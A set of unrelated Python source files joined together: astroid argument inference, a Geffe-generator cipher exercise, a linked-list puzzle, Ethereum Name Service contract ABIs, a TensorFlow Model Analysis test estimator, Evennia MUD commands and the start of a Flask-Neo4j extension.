# the extra parameter represented by `self` or `cls`
if funcnode.type in ("method", "classmethod"):
argindex -= 1
# 2. search arg index
try:
return self.positional_arguments[argindex].infer(context)
except IndexError:
pass
if funcnode.args.kwarg == name:
# It wants all the keywords that were passed into
# the call site.
if self.has_invalid_keywords():
raise exceptions.InferenceError(
"Inference failed to find values for all keyword arguments "
"to {func!r}: {unpacked_kwargs!r} doesn't correspond to "
"{keyword_arguments!r}.",
keyword_arguments=self.keyword_arguments,
unpacked_kwargs=self._unpacked_kwargs,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
kwarg = nodes.Dict(
lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
kwarg.postinit(
[(nodes.const_factory(key), value) for key, value in kwargs.items()]
)
return iter((kwarg,))
if funcnode.args.vararg == name:
# It wants all the args that were passed into
# the call site.
if self.has_invalid_arguments():
raise exceptions.InferenceError(
"Inference failed to find values for all positional "
"arguments to {func!r}: {unpacked_args!r} doesn't "
"correspond to {positional_arguments!r}.",
positional_arguments=self.positional_arguments,
unpacked_args=self._unpacked_args,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
args = nodes.Tuple(
lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
args.postinit(vararg)
return iter((args,))
# Check if it's a default parameter.
try:
return funcnode.args.default_value(name).infer(context)
except exceptions.NoDefault:
pass
raise exceptions.InferenceError(
"No value found for argument {arg} to {func!r}",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 30 09:48:53 2015
@author: Alejandro Alcalde (elbauldelprogramador.com)
"""
from ej2 import LFSR
def geffe(coef1, s1, coef2, s2, coef3, s3, l):
l1 = LFSR(coef1, s1, l)
l2 = LFSR(coef2, s2, l)
l3 = LFSR(coef3, s3, l)
r = []
for i, j, k in zip(l1,l2,l3):
x1 = i * j;
x2 = j * k;
x3 = k;
f = (x1 ^ x2) ^ x3
r.append(f)
return r
def encrypt(m, coef1, s1, coef2, s2, coef3, s3):
"""
Takes a message and ciphers it with a key using geffe
"""
k = geffe(coef1, s1, coef2, s2, coef3, s3, len(m))
c = ""
for i,j in zip(m,k):
c += chr(ord(i) ^ j)
return c, k
def decrypt(c, k):
"""
Decrypt a message cipher with geffe
"""
m = ""
for i,j in zip(c,k):
m += chr((ord(i) ^ j))
return m
c,k = encrypt(
"Lorem itsum sit amet",
[1,1,0,0,1,0], [1,1,1,1,0,1],
[1,0,1,0,1,1], [1,0,1,1,1,1],
[1,1,0,1,0,0], [1,1,0,1,0,0])
print "Cipher %s \n\n ..... \n\n%s" % (c,k)
print "Decipher \n\n" + decrypt(c,k)
## Primos relativos para p1p2p3
s = geffe([1,0,1], [1,1,1],
[1,0,0,1], [1,1,1,1],
[1,0,0,1,0], [1,1,1,1,1], 3500)
print ''.join(map(str, s))
|
# -*- coding:utf-8 -*-
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
"""
链表中倒数第k个结点
题目描述
输入一个链表,输出该链表中倒数第k个结点。
特殊情况 k=0 k 超过长度 head 为空
思路:
如果我们在遍历时维持两个指针,第一个指针从链表的头指针开始遍历,在第k-1步之前,第二个指针保持不动;
在第k-1步开始,第二个指针也开始从链表的头指针开始遍历。
由于两个指针的距离保持在k-1,当第一个(走在前面的)指针到达链表的尾结点时,第二个指针(走在后面的)指针正好是倒数第k个结点。
"""
class Solution:
def FindKthToTail(self, head, k):
# write code here
pre,aft=head,head
if head ==None:
return head
if k ==0:
return None
for i in range(k-1):
if aft.next == None:
return None
aft = aft.next
while aft.next != None:
aft = aft.next
pre = pre.next
return pre
|
ENS = [
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "resolver",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "owner",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "label",
"type": "bytes32"
},
{
"name": "owner",
"type": "address"
}
],
"name": "setSubnodeOwner",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "ttl",
"type": "uint64"
}
],
"name": "setTTL",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "ttl",
"outputs": [
{
"name": "",
"type": "uint64"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "resolver",
"type": "address"
}
],
"name": "setResolver",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "owner",
"type": "address"
}
],
"name": "setOwner",
"outputs": [],
"payable": False,
"type": "function"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "owner",
"type": "address"
}
],
"name": "Transfer",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": True,
"name": "label",
"type": "bytes32"
},
{
"indexed": False,
"name": "owner",
"type": "address"
}
],
"name": "NewOwner",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "resolver",
"type": "address"
}
],
"name": "NewResolver",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "ttl",
"type": "uint64"
}
],
"name": "NewTTL",
"type": "event"
}
]
AUCTION_REGISTRAR = [
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "releaseDeed",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "getAllowedTime",
"outputs": [
{
"name": "timestamp",
"type": "uint256"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "unhashedName",
"type": "string"
}
],
"name": "invalidateName",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "hash",
"type": "bytes32"
},
{
"name": "owner",
"type": "address"
},
{
"name": "value",
"type": "uint256"
},
{
"name": "salt",
"type": "bytes32"
}
],
"name": "shaBid",
"outputs": [
{
"name": "sealedBid",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "bidder",
"type": "address"
},
{
"name": "seal",
"type": "bytes32"
}
],
"name": "cancelBid",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "entries",
"outputs": [
{
"name": "",
"type": "uint8"
},
{
"name": "",
"type": "address"
},
{
"name": "",
"type": "uint256"
},
{
"name": "",
"type": "uint256"
},
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "ens",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
},
{
"name": "_value",
"type": "uint256"
},
{
"name": "_salt",
"type": "bytes32"
}
],
"name": "unsealBid",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "transferRegistrars",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "",
"type": "address"
},
{
"name": "",
"type": "bytes32"
}
],
"name": "sealedBids",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "state",
"outputs": [
{
"name": "",
"type": "uint8"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
},
{
"name": "newOwner",
"type": "address"
}
],
"name": "transfer",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
},
{
"name": "_timestamp",
"type": "uint256"
}
],
"name": "isAllowed",
"outputs": [
{
"name": "allowed",
"type": "bool"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "finalizeAuction",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "registryStarted",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "launchLength",
"outputs": [
{
"name": "",
"type": "uint32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "sealedBid",
"type": "bytes32"
}
],
"name": "newBid",
"outputs": [],
"payable": True,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "labels",
"type": "bytes32[]"
}
],
"name": "eraseNode",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hashes",
"type": "bytes32[]"
}
],
"name": "startAuctions",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "hash",
"type": "bytes32"
},
{
"name": "deed",
"type": "address"
},
{
"name": "registrationDate",
"type": "uint256"
}
],
"name": "acceptRegistrarTransfer",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "startAuction",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "rootNode",
"outputs": [
{
"name": "",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "hashes",
"type": "bytes32[]"
},
{
"name": "sealedBid",
"type": "bytes32"
}
],
"name": "startAuctionsAndBid",
"outputs": [],
"payable": True,
"type": "function"
},
{
"inputs": [
{
"name": "_ens",
"type": "address"
},
{
"name": "_rootNode",
"type": "bytes32"
},
{
"name": "_startDate",
"type": "uint256"
}
],
"payable": False,
"type": "constructor"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": False,
"name": "registrationDate",
"type": "uint256"
}
],
"name": "AuctionStarted",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": True,
"name": "bidder",
"type": "address"
},
{
"indexed": False,
"name": "deposit",
"type": "uint256"
}
],
"name": "NewBid",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": True,
"name": "owner",
"type": "address"
},
{
"indexed": False,
"name": "value",
"type": "uint256"
},
{
"indexed": False,
"name": "status",
"type": "uint8"
}
],
"name": "BidRevealed",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": True,
"name": "owner",
"type": "address"
},
{
"indexed": False,
"name": "value",
"type": "uint256"
},
{
"indexed": False,
"name": "registrationDate",
"type": "uint256"
}
],
"name": "HashRegistered",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": False,
"name": "value",
"type": "uint256"
}
],
"name": "HashReleased",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": True,
"name": "name",
"type": "string"
},
{
"indexed": False,
"name": "value",
"type": "uint256"
},
{
"indexed": False,
"name": "registrationDate",
"type": "uint256"
}
],
"name": "HashInvalidated",
"type": "event"
}
]
DEED = [
{
"constant": True,
"inputs": [],
"name": "creationDate",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [],
"name": "destroyDeed",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "newOwner",
"type": "address"
}
],
"name": "setOwner",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "registrar",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "owner",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "refundRatio",
"type": "uint256"
}
],
"name": "closeDeed",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "newRegistrar",
"type": "address"
}
],
"name": "setRegistrar",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "newValue",
"type": "uint256"
}
],
"name": "setBalance",
"outputs": [],
"payable": True,
"type": "function"
},
{
"inputs": [],
"type": "constructor"
},
{
"payable": True,
"type": "fallback"
},
{
"anonymous": False,
"inputs": [
{
"indexed": False,
"name": "newOwner",
"type": "address"
}
],
"name": "OwnerChanged",
"type": "event"
},
{
"anonymous": False,
"inputs": [],
"name": "DeedClosed",
"type": "event"
}
]
FIFS_REGISTRAR = [
{
"constant": True,
"inputs": [],
"name": "ens",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "",
"type": "bytes32"
}
],
"name": "expiryTimes",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "subnode",
"type": "bytes32"
},
{
"name": "owner",
"type": "address"
}
],
"name": "register",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "rootNode",
"outputs": [
{
"name": "",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"inputs": [
{
"name": "ensAddr",
"type": "address"
},
{
"name": "node",
"type": "bytes32"
}
],
"type": "constructor"
}
]
RESOLVER = [
{
"constant": True,
"inputs": [
{
"name": "interfaceID",
"type": "bytes4"
}
],
"name": "supportsInterface",
"outputs": [
{
"name": "",
"type": "bool"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "contentTypes",
"type": "uint256"
}
],
"name": "ABI",
"outputs": [
{
"name": "contentType",
"type": "uint256"
},
{
"name": "data",
"type": "bytes"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "x",
"type": "bytes32"
},
{
"name": "y",
"type": "bytes32"
}
],
"name": "setPubkey",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "content",
"outputs": [
{
"name": "ret",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "addr",
"outputs": [
{
"name": "ret",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "contentType",
"type": "uint256"
},
{
"name": "data",
"type": "bytes"
}
],
"name": "setABI",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "name",
"outputs": [
{
"name": "ret",
"type": "string"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "name",
"type": "string"
}
],
"name": "setName",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "hash",
"type": "bytes32"
}
],
"name": "setContent",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "pubkey",
"outputs": [
{
"name": "x",
"type": "bytes32"
},
{
"name": "y",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "addr",
"type": "address"
}
],
"name": "setAddr",
"outputs": [],
"payable": False,
"type": "function"
},
{
"inputs": [
{
"name": "ensAddr",
"type": "address"
}
],
"payable": False,
"type": "constructor"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "a",
"type": "address"
}
],
"name": "AddrChanged",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "hash",
"type": "bytes32"
}
],
"name": "ContentChanged",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "name",
"type": "string"
}
],
"name": "NameChanged",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": True,
"name": "contentType",
"type": "uint256"
}
],
"name": "ABIChanged",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "x",
"type": "bytes32"
},
{
"indexed": False,
"name": "y",
"type": "bytes32"
}
],
"name": "PubkeyChanged",
"type": "event"
}
]
REVERSE_REGISTRAR = [
{
"constant": False,
"inputs": [
{
"name": "owner",
"type": "address"
},
{
"name": "resolver",
"type": "address"
}
],
"name": "claimWithResolver",
"outputs": [
{
"name": "node",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "owner",
"type": "address"
}
],
"name": "claim",
"outputs": [
{
"name": "node",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "ens",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "defaultResolver",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "addr",
"type": "address"
}
],
"name": "node",
"outputs": [
{
"name": "ret",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "name",
"type": "string"
}
],
"name": "setName",
"outputs": [
{
"name": "node",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"inputs": [
{
"name": "ensAddr",
"type": "address"
},
{
"name": "resolverAddr",
"type": "address"
}
],
"payable": False,
"type": "constructor"
}
]
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exports a simple estimator with control dependencies using tf.Learn.
This is the fixed prediction estimator with extra fields, but it creates
metrics with control dependencies on the features, predictions and labels.
This is for use in tests to verify that TFMA correctly works around the
TensorFlow issue #17568.
This model always predicts the value of the "prediction" feature.
The eval_input_receiver_fn also parses the "fixed_float", "fixed_string",
"fixed_int", and "var_float", "var_string", "var_int" features.
"""
from __future__ import absolute_import
from __future__ import division
# Standard __future__ imports
from __future__ import print_function
# Standard Imports
import tensorflow as tf
from tensorflow_model_analysis.eval_saved_model import export
from tensorflow_model_analysis.eval_saved_model.example_trainers import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.estimator.canned import prediction_keys
def simple_control_dependency_estimator(export_path, eval_export_path):
"""Exports a simple estimator with control dependencies."""
def control_dependency_metric(increment, target):
"""Metric that introduces a control dependency on target.
The value is incremented by increment each time the metric is called
(so the value can vary depending on how things are batched). This is mainly
to verify that the metric was called.
Args:
increment: Amount to increment the value by each time the metric is
called.
target: Tensor to introduce the control dependency on.
Returns:
value_op, update_op for the metric.
"""
total_value = tf.compat.v1.Variable(
initial_value=0.0,
dtype=tf.float64,
trainable=False,
collections=[
tf.compat.v1.GraphKeys.METRIC_VARIABLES,
tf.compat.v1.GraphKeys.LOCAL_VARIABLES
],
validate_shape=True)
with tf.control_dependencies([target]):
update_op = tf.identity(tf.compat.v1.assign_add(total_value, increment))
value_op = tf.identity(total_value)
return value_op, update_op
def model_fn(features, labels, mode, config):
"""Model function for custom estimator."""
del config
predictions = features['prediction']
predictions_dict = {
prediction_keys.PredictionKeys.PREDICTIONS: predictions,
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions_dict,
export_outputs={
tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
tf.estimator.export.RegressionOutput(predictions)
})
loss = tf.compat.v1.losses.mean_squared_error(predictions,
labels['actual_label'])
train_op = tf.compat.v1.assign_add(tf.compat.v1.train.get_global_step(), 1)
eval_metric_ops = {}
if mode == tf.estimator.ModeKeys.EVAL:
eval_metric_ops = {
metric_keys.MetricKeys.LOSS_MEAN:
tf.compat.v1.metrics.mean(loss),
'control_dependency_on_fixed_float':
control_dependency_metric(1.0, features['fixed_float']),
# Introduce a direct dependency on the values Tensor. If we
# introduce another intervening op like sparse_tensor_to_dense then
# regardless of whether TFMA correctly wrap SparseTensors we will not
# encounter the TF bug.
'control_dependency_on_var_float':
control_dependency_metric(10.0, features['var_float'].values),
'control_dependency_on_actual_label':
control_dependency_metric(100.0, labels['actual_label']),
'control_dependency_on_var_int_label':
control_dependency_metric(1000.0, labels['var_int'].values),
# Note that TFMA does *not* wrap predictions, so in most cases
# if there's a control dependency on predictions they will be
# recomputed.
'control_dependency_on_prediction':
control_dependency_metric(10000.0, predictions),
}
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
predictions=predictions_dict,
eval_metric_ops=eval_metric_ops)
def train_input_fn():
"""Train input function."""
return {
'prediction': tf.constant([[1.0], [2.0], [3.0], [4.0]]),
}, {
'actual_label': tf.constant([[1.0], [2.0], [3.0], [4.0]])
}
feature_spec = {'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32)}
eval_feature_spec = {
'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32),
'label': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_float': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_string': tf.io.FixedLenFeature([1], dtype=tf.string),
'fixed_int': tf.io.FixedLenFeature([1], dtype=tf.int64),
'var_float': tf.io.VarLenFeature(dtype=tf.float32),
'var_string': tf.io.VarLenFeature(dtype=tf.string),
'var_int': tf.io.VarLenFeature(dtype=tf.int64),
}
estimator = tf.estimator.Estimator(model_fn=model_fn)
estimator.train(input_fn=train_input_fn, steps=1)
def eval_input_receiver_fn():
"""An input_fn that expects a serialized tf.Example."""
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
features = tf.io.parse_example(
serialized=serialized_tf_example, features=eval_feature_spec)
labels = {'actual_label': features['label'], 'var_int': features['var_int']}
return export.EvalInputReceiver(
features=features,
labels=labels,
receiver_tensors={'examples': serialized_tf_example})
return util.export_model_and_eval_model(
estimator=estimator,
serving_input_receiver_fn=(
tf.estimator.export.build_parsing_serving_input_receiver_fn(
feature_spec)),
eval_input_receiver_fn=eval_input_receiver_fn,
export_path=export_path,
eval_export_path=eval_export_path)
|
"""
Example command module template
Copy this module up one level to gamesrc/commands/ and name it as
befits your use. You can then use it as a template to define your new
commands. To use them you also need to group them in a CommandSet (see
examples/cmdset.py)
"""
import time
from ev import Command as BaseCommand
from ev import default_cmds
from ev import utils
from settings import *
"""
This sets up the basis for a Evennia's 'MUX-like' command
style. The idea is that most other Mux-related commands should
just inherit from this and don't have to implement parsing of
their own unless they do something particularly advanced.
A MUXCommand command understands the following possible syntax:
name[ with several words][/switch[/switch..]] arg1[,arg2,...] [[=|,] arg[,..]]
The 'name[ with several words]' part is already dealt with by the
cmdhandler at this point, and stored in self.cmdname. The rest is stored
in self.args.
The MuxCommand parser breaks self.args into its constituents and stores them in the
following variables:
self.switches = optional list of /switches (without the /)
self.raw = This is the raw argument input, including switches
self.args = This is re-defined to be everything *except* the switches
self.lhs = Everything to the left of = (lhs:'left-hand side'). If
no = is found, this is identical to self.args.
self.rhs: Everything to the right of = (rhs:'right-hand side').
If no '=' is found, this is None.
self.lhslist - self.lhs split into a list by comma
self.rhslist - list of self.rhs split into a list by comma
self.arglist = list of space-separated args (including '=' if it exists)
All args and list members are stripped of excess whitespace around the
strings, but case is preserved.
"""
class Sheet(default_cmds.MuxCommand):
"""
+sheet looks up the character information of your character. You can use
the /bg switch to get the background of your character.
Priviledged users can give a player's name as an argument to this command
and get their info.
"""
key = "sheet"
locks = "cmd:all()"
help_category = "Character"
def display_sheet(self,char):
"""
Displays a character sheet.
"""
if not char.db.stats:
stat_dict = { }
else:
stat_dict = char.db.stats
self.caller.msg(char.name + ", the " + str(char.db.sex) + " " + str(char.db.species) + ":")
self.caller.msg("")
for key, value in stat_dict.items():
self.caller.msg("{c%-11s: {y%s" % (key, str(value)))
self.caller.msg("")
if char.db.qualities:
for key, value in char.db.qualities.items():
line = "{c%-20s{b: {g%s{n" % (key, value)
self.caller.msg(line)
def display_background(self, char):
"""
Displays a character's background.
"""
self.caller.msg("The legend of " + char.name + ":")
self.caller.msg("")
background = char.db.background
if not background:
self.caller.msg(" This tale is not written.")
return
self.caller.msg(background)
def func(self):
"""
Primary function for +sheet.
"""
self.caller.msg("")
if self.args:
if not (self.caller.check_permstring("Immortals") or self.caller.check_permstring("Wizards")
or self.caller.check_permstring("PlayerHelpers")):
self.caller.msg("Players cannot look at each other's sheets.")
return
char_list = self.caller.search(self.args, global_search=True, ignore_errors=True)
if char_list:
char = char_list[0]
else:
self.caller.msg("No such character: " + self.args)
self.caller.msg("")
else:
char = self.caller
if "bg" in self.switches:
self.display_background(char)
self.caller.msg("")
return
self.display_sheet(char)
self.caller.msg("")
class WhoSpec(default_cmds.MuxCommand):
"""
Whospecies looks up all players in the room and grabs their name, sex,
species, and status. You can use the /far switch to look up a remote player.
For instance,
ws/far Thaddius
...will look up Thaddius's name, sex, species, and status.
"""
# these need to be specified
key = "whospecies"
aliases = ["ws", "whos", "whospec"]
locks = "cmd:all()"
help_category = "Character"
def func(self):
"""
This is the hook function that actually does all the work. It is called
by the cmdhandler right after self.parser() finishes, and so has access
to all the variables defined therein.
"""
characters = [ thing for thing in self.caller.location.contents
if thing.player
]
if "far" in self.switches:
characters = [ thing for thing in
self.caller.search(self.args, global_search=True, ignore_errors=True)
if thing.player
]
idle_threshhold = 180 # Three minutes minimum idle.
self.caller.msg("+-Stat---Name----------------------------Sex---------Species-----------------+")
for character in characters:
if character.sessions:
idle_time = time.time() - character.sessions[0].cmd_last_visible
if idle_time > idle_threshhold:
name = name = character.name + "[Idle " + utils.time_format(idle_time,1) + "]"
else:
name = character.name
else:
name = character.name + "[Zzz]"
status = character.db.status
if not status:
status = ""
line = "| %-5s| %-30s| %-10s| %-24s|" % ( character.db.status, name, character.db.sex, character.db.species )
self.caller.msg(line)
self.caller.msg("+----------------------------------------------------------------------------+")
|
from __future__ import print_function
import time
import logging
from py2neo import Graph,Node
from py2neo.ext import ogm
from py2neo.packages.httpstream.http import SocketError
log = logging.getLogger('flask.neo4j')
logging.basicConfig()
# Find the stack on which we want to store the GraphDatabaseService instance.
# Starting with Flask 0.9, the _app_ctx_stack is the correct one,
# before that we need to use the _request_ctx_stack.
try:
from flask import _app_ctx_stack as stack
except ImportError:
from flask import _request_ctx_stack as stack
class Neo4j(object):
"""Automatically connects to Neo4j graph database using parameters defined
in Flask configuration.
One can use this extension by providing the Flask app on instantiation or
by calling the :meth:`init_app` method on an instance object of `Neo4j`. An example
of providing the application on instantiation: ::
app = Flask(__name__)
n4j = Neo4j(app)
...and an example calling the :meth:`init_app` method instead: ::
n4j = Neo4j()
def init_app():
app = Flask(__name__)
n4j.init_app(app)
return app
One can also providing a dict of indexes that will be used to automatically
get or create indexes in the graph database ::
app = Flask(__name__)
graph_indexes = {'Species': neo4j.Node}
n4j = Neo4j(app, graph_indexes)
print n4j.gdb.neo4j_version
species_index = n4j.index['Species']
...
"""
def __init__(self, app=None, indexes=None):
self.app = app
self._indexes = indexes
if app is not None:
self.init_app(app)
print ("flask.ext.Neo4j init_app called")
def init_app(self, app):
"""Initialize the `app` for use with this :class:`~Neo4j`. This is
called automatically if `app` is passed to :meth:`~Neo4j.__init__`.
The app is configured according to these configuration variables
``CONNECTION_RETRY``
``RETRY_INTERVAL``
:param flask.Flask app: the application configured for use with
this :class:`~Neo4j`
"""
self.app = app
app.n4j = self
if not hasattr(app, 'extensions'):
app.extensions = {}
app.extensions['neo4j'] = self
# Use the newstyle teardown_appcontext if it's available,
# otherwise fall back to the request context
if hasattr(app, 'teardown_appcontext'):
app.teardown_appcontext(self.teardown)
else:
app.teardown_request(self.teardown)
def teardown(self, exception):
ctx = stack.top # TODO clean up teardown related to graph_db behavior
if hasattr(ctx, 'graph_db'):
# py2neo does not have an 'open' connection that needs closing
ctx.graph_db = None
@property
def gdb(self):
"""The graph database service instance as a property, for convenience.
Note: The property will use these configuration variables
``CONNECTION_RETRY``
``RETRY_INTERVAL``
:return: the graph database service as a property
"""
retry = False
